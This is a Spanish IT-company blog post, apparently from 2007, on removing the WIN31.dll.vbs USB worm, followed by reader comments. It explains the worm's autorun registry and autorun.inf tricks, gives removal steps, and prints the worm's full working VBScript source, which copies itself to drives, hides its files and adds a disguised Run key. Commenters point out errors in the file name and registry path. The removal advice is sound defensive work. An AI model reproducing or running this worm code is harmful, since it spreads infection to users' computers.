Puñetero win31.dll.vb

Mantenimiento informático de calidad Horas ilimitadas Visitas mensuales Sin permanencia Siempre el mismo técnico Puesta a punto inicial

Puñetero win31.dll.vb

Twitter Facebook Pinterest LinkedIn WhatsApp

Ayer sin saber muy bien desde donde comenzó el antivirus a dar la turra con pasar el virus win31.dll.ws, la insistencia en querer eliminarle evidenciaba que el virus estaba mejor instalado que el propio XP, así que ahora comenzaba el trabajo de desinstalarle

En principio el pájaro este no deja de ser uno de los miles de fallos de seguridad el propio xp, el programilla en cuestión se aprovecha de un script hecho en vscript, y se copia en el directorio c:\windows, o donde se haya instalado el sistema operativo, luego crea que existan las entradas en el registro, en principio busca las unidades dentro del registro y genera una entrada del siguiente modo:

HCURRENT_USER\Software\Windows\CurrentVersion\Explorer\MountPoint2\

aquí se encuentran las unidades de disco identificadas con nombres como {1db9233e-0a99-11dc-8cde-005056c00008}

dentro de las unidades crea el siguiente registro:

Shell\AutoRun\Command

(Predeterminado) =C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe WIN31.dll.vbs

De tal forma que cuando se quiera abrir una unidad de disco con el dobleclick, se ejecute el script win31.dll.vbs

Pero ahi no queda la cosa, tambien va creando a su paso todo los autorun.inf con un contenido como este:

[autorun]
shellexecute=wscript.exe WIN31.dll.vbs

que viene a hacer básicamente lo mismo pero a nivel de carpeta, el autorun.inf, se diseño para que al hacer dobleclick en una carpeta se ejecutase un comando por defecto, generalmente le arranque de un programa de setup, este virus le usa para instalarse en el sistema.

Resumiendo que la forma de quitarlo es relativamente sencilla

  1. Desde el administrador de tareas “finalizar” wsscript.exe, que es quien ejecuta el script

  2. buscar los ficheros llamados win31.dll.ws, y eliminarlos

  3. eliminar todas los autorun.inf que hagan referencia a win31.dll.ws; esto no es necesario pero si recomendable

  4. eliminar las entradas del registro “shell\autorun\command”

aquí dejo una copia del virus/script resulta interesante como ejercicio de estudio:

on error resume next

Rem 121206, do u still remember dis day us_3?

Dim src, winpath, flashdrive, fs, mf, atr, tf, rg, nt, check, sd:atr = «[autorun]»&vbcrlf&»shellexecute=wscript.exe WIN31.dll.vbs»:Set fs = CreateObject(«Scripting.FileSystemObject»): Set mf = fs.getfile(Wscript.ScriptFullname): Dim text, size: size = mf.size: check = mf.drive.drivetype: Set text = mf.openastextstream(1, -2)

Do While Not text.atendofstream: src=src&text.readline: src = src & vbCrLf: Loop

Do: Set winpath = fs.getspecialfolder(0): Set tf = fs.getfile(winpath & «\WIN31.dll.vbs»): tf.Attributes = 32: Set tf = fs.createtextfile(winpath & «\WIN31.dll.vbs», 2, True): tf.write src: tf.Close: Set tf = fs.getfile(winpath & «\WIN31.dll.vbs»): tf.Attributes = 39

For Each flashdrive In fs.drives

If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path «A:» Then: Set tf = fs.getfile(flashdrive.Path & «\WIN31.dll.vbs»): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & «\WIN31.dll.vbs», 2, True): tf.write src: tf.Close: Set tf = fs.getfile(flashdrive.Path & «\WIN31.dll.vbs»): tf.Attributes = 39: Set tf = fs.getfile(flashdrive.Path & «\autorun.inf»): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & «\autorun.inf», 2, True): tf.write atr: tf.Close: Set tf = fs.getfile(flashdrive.Path & «\autorun.inf»): tf.Attributes = 39: End If

Next

Set rg = CreateObject(«WScript.Shell»): rg.regwrite «HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\mcafee»,winpath & «\WIN31.dll.vbs»: rg.regwrite «HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title», «BANTAI USA & EZRAEL [AL – MUKHLIS STUDIO]»: rg.regwrite «HKCR\vbsfile\DefaultIcon», «shell32.dll,2»

If check 1 Then Wscript.sleep 200000

Loop While check 1: Set sd = CreateObject(«Wscript.shell»): sd.run winpath & «\explorer.exe /e,/select, » & Wscript.ScriptFullname

Twitter Facebook Pinterest LinkedIn WhatsApp

 

3 comentarios

  1. Anonymous dice:
    21 diciembre 2007 a las 13:24

    El archivo se llama win31.dll.vbs, no win31.dll.ws

    Responder
  2. Anonymous dice:
    27 diciembre 2007 a las 07:36

    Ya que ayudas, hazlo bien, que me voy a volver loco buscando en el registro!

    La ruta es:

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2

    Responder
  3. Sony Sax dice:
    1 enero 2008 a las 06:21

    Dicen que es de malnacidos ser desagradecido, el caso tuyo, es desgraciadamente una claro ejemplo de este reflan. Eres uno de esos «fenomenos del barrio» de los de no haber leido un puñetero libro de informatica en tu vida, pero que gracias a tu adsl de 4 mgs, y tu ordenador de ultima generacion, cargado de virus hasta las patas, descubriste un dia la palabra google, la cual puedes retener con las cuatro neuronas que tienes, asi que a partir de aqui es facil encontrar un blog donde poder seguir los pasos al pie de la letra, para luego coronarte como «fenomeno local»

    En fin sigue en tu mundo, pero no toques las narices ensuciando mi blog con tus estupidos comentarios.

    Responder

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Publicamos artículos casi diariamente. Si quieres estar informado puedes hacerlo introduciendo aquí tu correo electrónico

Introduce email:

c/ Atalaya 22
Santander (cantabria)

902 052 570

IP Publica:18.190.176.157

Mantenimiento informático para empresas

©  2024 JGSOFT S.L.✨✨✨. 

A %d blogueros les gusta esto: